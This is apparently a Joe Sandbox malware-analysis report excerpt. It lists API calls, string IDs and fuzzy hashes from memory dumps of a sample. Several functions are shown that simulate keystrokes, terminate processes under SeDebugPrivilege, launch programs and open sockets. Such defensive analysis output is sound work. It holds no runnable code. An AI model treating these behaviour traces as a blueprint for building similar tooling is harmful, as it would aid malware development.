                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: InvalidateRect
                                                          • String ID:
                                                          • API String ID: 634782764-0
                                                          • Opcode ID: e416b8f1bc6e7858372e4e53fabcc6d1fa8e83ffe98587d9beb083e0f80d5d20
                                                          • Instruction ID: 0a4e3fdffc5e4fd5738a6a02c3c683e5068b8109688b447d5087c89642b87fb3
                                                          • Opcode Fuzzy Hash: e416b8f1bc6e7858372e4e53fabcc6d1fa8e83ffe98587d9beb083e0f80d5d20
                                                          • Instruction Fuzzy Hash: DB518F30670245FEEB249F28CC89B997BB5AB05350F244513F915EA3E1CFB1ADA4CE64
                                                          APIs
                                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0028C638
                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0028C65A
                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0028C672
                                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0028C690
                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0028C6B1
                                                          • DestroyIcon.USER32(00000000), ref: 0028C6C0
                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0028C6DD
                                                          • DestroyIcon.USER32(?), ref: 0028C6EC
                                                            • Part of subcall function 002DAAD4: DeleteObject.GDI32(00000000), ref: 002DAB0D
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                          • String ID:
                                                          • API String ID: 2819616528-0
                                                          • Opcode ID: 701069b6135075aa898227946b8c2cea7ddd84bcbe0a3052feb49606a1168c98
                                                          • Instruction ID: 3f2f1fd494b3002f892cd39e9c4bf3b024d3933f80d4570954641b337a13489b
                                                          • Instruction Fuzzy Hash: CF518F74620206EFDB24DF24DC85BAA77B9EB48311F204528F902A76D0D7B0ECA5DF64
                                                          APIs
                                                            • Part of subcall function 002AB52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 002AB54D
                                                            • Part of subcall function 002AB52D: GetCurrentThreadId.KERNEL32 ref: 002AB554
                                                            • Part of subcall function 002AB52D: AttachThreadInput.USER32(00000000,?,002AA23B,?,00000001), ref: 002AB55B
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 002AA246
                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 002AA263
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 002AA266
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 002AA26F
                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 002AA28D
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 002AA290
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 002AA299
                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 002AA2B0
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 002AA2B3
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                          • String ID:
                                                          • API String ID: 2014098862-0
                                                          • Opcode ID: e6908c4f58be1f7c9a6d1d5d51d1641a08c9ed861ca36a90a61b7c3fdbd8be3f
                                                          • Instruction ID: b112a2b003f2c37a1d86f0e6efdacef3d64817749590858dfad3103602823372
                                                          • Instruction Fuzzy Hash: DF11C271990258BFFA106B60ACCDF6A7B1DDB4D750F500415F6446F090CAF26CA1DEA4
                                                          APIs
                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,002A915A,00000B00,?,?), ref: 002A94E2
                                                          • HeapAlloc.KERNEL32(00000000,?,002A915A,00000B00,?,?), ref: 002A94E9
                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,002A915A,00000B00,?,?), ref: 002A94FE
                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,002A915A,00000B00,?,?), ref: 002A9506
                                                          • DuplicateHandle.KERNEL32(00000000,?,002A915A,00000B00,?,?), ref: 002A9509
                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,002A915A,00000B00,?,?), ref: 002A9519
                                                          • GetCurrentProcess.KERNEL32(002A915A,00000000,?,002A915A,00000B00,?,?), ref: 002A9521
                                                          • DuplicateHandle.KERNEL32(00000000,?,002A915A,00000B00,?,?), ref: 002A9524
                                                          • CreateThread.KERNEL32(00000000,00000000,002A954A,00000000,00000000,00000000), ref: 002A953E
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                          • String ID:
                                                          • API String ID: 1957940570-0
                                                          • Opcode ID: 6ff08eb5da3178d011708bec0850d7ffc1640e7fc0caf795161336c085cc1b74
                                                          • Instruction ID: 3280bd538ab869715d28bf58b99b1afbd99822b426fbe0b91d7b26d70882a380
                                                          • Instruction Fuzzy Hash: 9C01BBB5680344BFE710ABA5ECCDF6B7BACEB89711F404411FA05DF1A1CAB0A841CB20
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                          • API String ID: 0-572801152
                                                          • Opcode ID: 7ebe6318e73ef5201b5607d5ec5d88afae14b286be0cbc502118223a7928c21c
                                                          • Instruction ID: 4b3709b59f256f24bbff8ca5418b6a82df7c3b9f21f4665451e4d7c72bfa25ca
                                                          • Instruction Fuzzy Hash: 47C1A171E2021A9FDF14CFA8C884FAEB7B5BB48348F14856DE905AB280E7709D55CB91
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$_memset
                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                          • API String ID: 2862541840-625585964
                                                          • Opcode ID: 54fca919ba7505cecabb9eb6305e8aafab3b19bcdc8b47932dcd038bbe1c6c09
                                                          • Instruction ID: baa31f55eaefcb07a2eb9a64a931933f93212d441be1627108ad1ee329cd9e69
                                                          • Instruction Fuzzy Hash: 51918271A20219AFDF24DFA5C888F9EB7B8EF45710F10865DF515AB280D7709994CFA0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 002D7449
                                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 002D745D
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002D7477
                                                          • _wcscat.LIBCMT ref: 002D74D2
                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 002D74E9
                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 002D7517
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window_wcscat
                                                          • String ID: SysListView32
                                                          • API String ID: 307300125-78025650
                                                          • Opcode ID: 5ad9552cbd8201e44f438990dfe49ec52f3c571f639ee3d88a98c2a6e8b69c57
                                                          • Instruction ID: cb7fe94956c56a70c767f67a9e95cc2619df4d546632a999c9148020024e1a46
                                                          • Instruction Fuzzy Hash: FA41D370954349AFDB229F64CC85BEE77B8EF08350F10442AF984A72D1E3759D94CB60
                                                          APIs
                                                            • Part of subcall function 002B4148: CreateToolhelp32Snapshot.KERNEL32 ref: 002B416D
                                                            • Part of subcall function 002B4148: Process32FirstW.KERNEL32(00000000,?), ref: 002B417B
                                                            • Part of subcall function 002B4148: CloseHandle.KERNEL32(00000000), ref: 002B4245
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002CF08D
                                                          • GetLastError.KERNEL32 ref: 002CF0A0
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002CF0CF
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 002CF14C
                                                          • GetLastError.KERNEL32(00000000), ref: 002CF157
                                                          • CloseHandle.KERNEL32(00000000), ref: 002CF18C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                          • String ID: SeDebugPrivilege
                                                          • API String ID: 2533919879-2896544425
                                                          • Opcode ID: 6cd07174bdca894127a6ae4c56617495e61ec87ae325d546aec5aa16f14d43b9
                                                          • Instruction ID: 52284e97d3371ea092860cbd7472622e32942497487619d821f2f8f129b69cbb
                                                          • Instruction Fuzzy Hash: 8741CD312202019FDB15EF24DDD9F6DB7A1AF80714F08816DF80A5F292CBB4A965CF95
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 002B4802
                                                          • LoadStringW.USER32(00000000), ref: 002B4809
                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 002B481F
                                                          • LoadStringW.USER32(00000000), ref: 002B4826
                                                          • _wprintf.LIBCMT ref: 002B484C
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002B486A
                                                          Strings
                                                          • %s (%d) : ==> %s: %s %s, xrefs: 002B4847
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                          • API String ID: 3648134473-3128320259
                                                          • Opcode ID: 33959a5097ac827dff5dd564a7163fa023eb75e7dcfe772b8769f15b7b3ed66e
                                                          • Instruction ID: f0f656195b907f85089fd14d32a9eae28be9ca4b61bb6eab95c1bb755126e2f5
                                                          • Instruction Fuzzy Hash: 7D0144F29502487FE721AB94ADC9EF6736CD708300F400595B749DA041E6B45E954F75
                                                          APIs
                                                            • Part of subcall function 002529E2: GetWindowLongW.USER32(?,000000EB), ref: 002529F3
                                                          • GetSystemMetrics.USER32(0000000F), ref: 002DDB42
                                                          • GetSystemMetrics.USER32(0000000F), ref: 002DDB62
                                                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 002DDD9D
                                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 002DDDBB
                                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 002DDDDC
                                                          • ShowWindow.USER32(00000003,00000000), ref: 002DDDFB
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 002DDE20
                                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 002DDE43
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                          • String ID:
                                                          • API String ID: 1211466189-0
                                                          • Opcode ID: 98be6d9a5095d60e7d803fffd2faffcea872e19cbf05eb7a11e325160aad3d55
                                                          • Instruction ID: 313bc16d18120063971e914efa69736668b12749b81a8acd21d4a982aff2f144
                                                          • Instruction Fuzzy Hash: A7B16931610616EBDF14CF69C9C97BD7BB1BF04705F08806AEC489E295D774ADA0CBA0
                                                          APIs
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                            • Part of subcall function 002D147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002D040D,?,?), ref: 002D1491
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002D044E
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: BuffCharConnectRegistryUpper_memmove
                                                          • String ID:
                                                          • API String ID: 3479070676-0
                                                          • Opcode ID: 3283224d2d45e1dae3d7a37d8255461088fee6b46c031c308454e0b5b6bfe191
                                                          • Instruction ID: da468526f8c09b299c99e20f17a3dc7739c60914e36c0f27614be328794edcfb
                                                          • Instruction Fuzzy Hash: 6CA16C302242019FCB10EF64D885F2EB7E5AF84314F14891EF9959B2A1DB71EDA5CF86
                                                          APIs
                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0028C508,00000004,00000000,00000000,00000000), ref: 00252E9F
                                                          • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0028C508,00000004,00000000,00000000,00000000,000000FF), ref: 00252EE7
                                                          • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0028C508,00000004,00000000,00000000,00000000), ref: 0028C55B
                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0028C508,00000004,00000000,00000000,00000000), ref: 0028C5C7
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ShowWindow
                                                          • String ID:
                                                          • API String ID: 1268545403-0
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 002B7698
                                                            • Part of subcall function 00270FE6: std::exception::exception.LIBCMT ref: 0027101C
                                                            • Part of subcall function 00270FE6: __CxxThrowException@8.LIBCMT ref: 00271031
                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 002B76CF
                                                          • EnterCriticalSection.KERNEL32(?), ref: 002B76EB
                                                          • _memmove.LIBCMT ref: 002B7739
                                                          • _memmove.LIBCMT ref: 002B7756
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 002B7765
                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 002B777A
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 002B7799
                                                          Similarity
                                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 256516436-0
                                                          APIs
                                                          • DeleteObject.GDI32(00000000), ref: 002D6810
                                                          • GetDC.USER32(00000000), ref: 002D6818
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002D6823
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 002D682F
                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 002D686B
                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 002D687C
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,002D964F,?,?,000000FF,00000000,?,000000FF,?), ref: 002D68B6
                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 002D68D6
                                                          Similarity
                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                          • String ID:
                                                          • API String ID: 3864802216-0
                                                          APIs
                                                          Similarity
                                                          • API ID: _memcmp
                                                          • String ID:
                                                          • API String ID: 2931989736-0
                                                          APIs
                                                            • Part of subcall function 00254D37: __itow.LIBCMT ref: 00254D62
                                                            • Part of subcall function 00254D37: __swprintf.LIBCMT ref: 00254DAC
                                                            • Part of subcall function 0026436A: _wcscpy.LIBCMT ref: 0026438D
                                                          • _wcstok.LIBCMT ref: 002BF2D7
                                                          • _wcscpy.LIBCMT ref: 002BF366
                                                          • _memset.LIBCMT ref: 002BF399
                                                          Strings
                                                          Similarity
                                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                          • String ID: X
                                                          • API String ID: 774024439-3081909835
                                                          APIs
                                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 002C72EB
                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 002C730C
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 002C731F
                                                          • htons.WSOCK32(?,?,?,00000000,?), ref: 002C73D5
                                                          • inet_ntoa.WSOCK32(?), ref: 002C7392
                                                            • Part of subcall function 002AB4EA: _strlen.LIBCMT ref: 002AB4F4
                                                            • Part of subcall function 002AB4EA: _memmove.LIBCMT ref: 002AB516
                                                          • _strlen.LIBCMT ref: 002C742F
                                                          • _memmove.LIBCMT ref: 002C7498
                                                          Similarity
                                                          • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                          • String ID:
                                                          • API String ID: 3619996494-0
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          APIs
                                                          • IsWindow.USER32(016F5700), ref: 002DBA5D
                                                          • IsWindowEnabled.USER32(016F5700), ref: 002DBA69
                                                          • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 002DBB4D
                                                          • SendMessageW.USER32(016F5700,000000B0,?,?), ref: 002DBB84
                                                          • IsDlgButtonChecked.USER32(?,?), ref: 002DBBC1
                                                          • GetWindowLongW.USER32(016F5700,000000EC), ref: 002DBBE3
                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 002DBBFB
                                                          Similarity
                                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                          • String ID:
                                                          • API String ID: 4072528602-0
                                                          APIs
                                                          • _memset.LIBCMT ref: 002CFB31
                                                          • _memset.LIBCMT ref: 002CFBFA
                                                          • ShellExecuteExW.SHELL32(?), ref: 002CFC3F
                                                            • Part of subcall function 00254D37: __itow.LIBCMT ref: 00254D62
                                                            • Part of subcall function 00254D37: __swprintf.LIBCMT ref: 00254DAC
                                                            • Part of subcall function 0026436A: _wcscpy.LIBCMT ref: 0026438D
                                                          • GetProcessId.KERNEL32(00000000), ref: 002CFCB6
                                                          • CloseHandle.KERNEL32(00000000), ref: 002CFCE5
                                                          Strings
                                                          Similarity
                                                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                          • String ID: @
                                                          • API String ID: 3522835683-2766056989
                                                          APIs
                                                          • GetParent.USER32(?), ref: 002B178B
                                                          • GetKeyboardState.USER32(?), ref: 002B17A0
                                                          • SetKeyboardState.USER32(?), ref: 002B1801
                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 002B182F
                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 002B184E
                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 002B1894
                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 002B18B7
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          APIs
                                                          • GetParent.USER32(00000000), ref: 002B15A4
                                                          • GetKeyboardState.USER32(?), ref: 002B15B9
                                                          • SetKeyboardState.USER32(?), ref: 002B161A
                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 002B1646
                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 002B1663
                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 002B16A7
                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 002B16C8
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          APIs
                                                          Similarity
                                                          • API ID: _wcsncpy$LocalTime
                                                          • String ID:
                                                          • API String ID: 2945705084-0
                                                          • Opcode ID: 6759a4237406c424f21d0cbb433cd4cefc2f5b590f559e5561e6b5ea345dbebe
                                                          • Instruction ID: fd87b03b334b339f9b01339e878069157616cf73767d04645d97be6aa357d5b5
                                                          • Opcode Fuzzy Hash: 6759a4237406c424f21d0cbb433cd4cefc2f5b590f559e5561e6b5ea345dbebe
                                                          • Instruction Fuzzy Hash: 24417F65C3062876CB11FBB4C84AACFB7B9AF04310F508956E909E3121E734A6698BA5
                                                          APIs
                                                            • Part of subcall function 002B4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002B3B8A,?), ref: 002B4BE0
                                                            • Part of subcall function 002B4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002B3B8A,?), ref: 002B4BF9
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 002B3BAA
                                                          • _wcscmp.LIBCMT ref: 002B3BC6
                                                          • MoveFileW.KERNEL32(?,?), ref: 002B3BDE
                                                          • _wcscat.LIBCMT ref: 002B3C26
                                                          • SHFileOperationW.SHELL32(?), ref: 002B3C92
                                                          Strings
                                                          Similarity
                                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                          • String ID: \*.*
                                                          • API String ID: 1377345388-1173974218
                                                          • Opcode ID: d9b5ee3fa8eae0cf66bfddbdaeae2bda2db8fcb2452ee384c4cd87fb8b32f4a0
                                                          • Instruction ID: 36ab22eaf63fe0e57bd4626c91cda79591912eb4bc6f26696270be3516120025
                                                          • Opcode Fuzzy Hash: d9b5ee3fa8eae0cf66bfddbdaeae2bda2db8fcb2452ee384c4cd87fb8b32f4a0
                                                          • Instruction Fuzzy Hash: F2417E7151C3459AC752EF64D485AEBB7ECAF88380F50096EF489C3192EB34D698CB52
                                                          APIs
                                                          • _memset.LIBCMT ref: 002D78CF
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002D7976
                                                          • IsMenu.USER32(?), ref: 002D798E
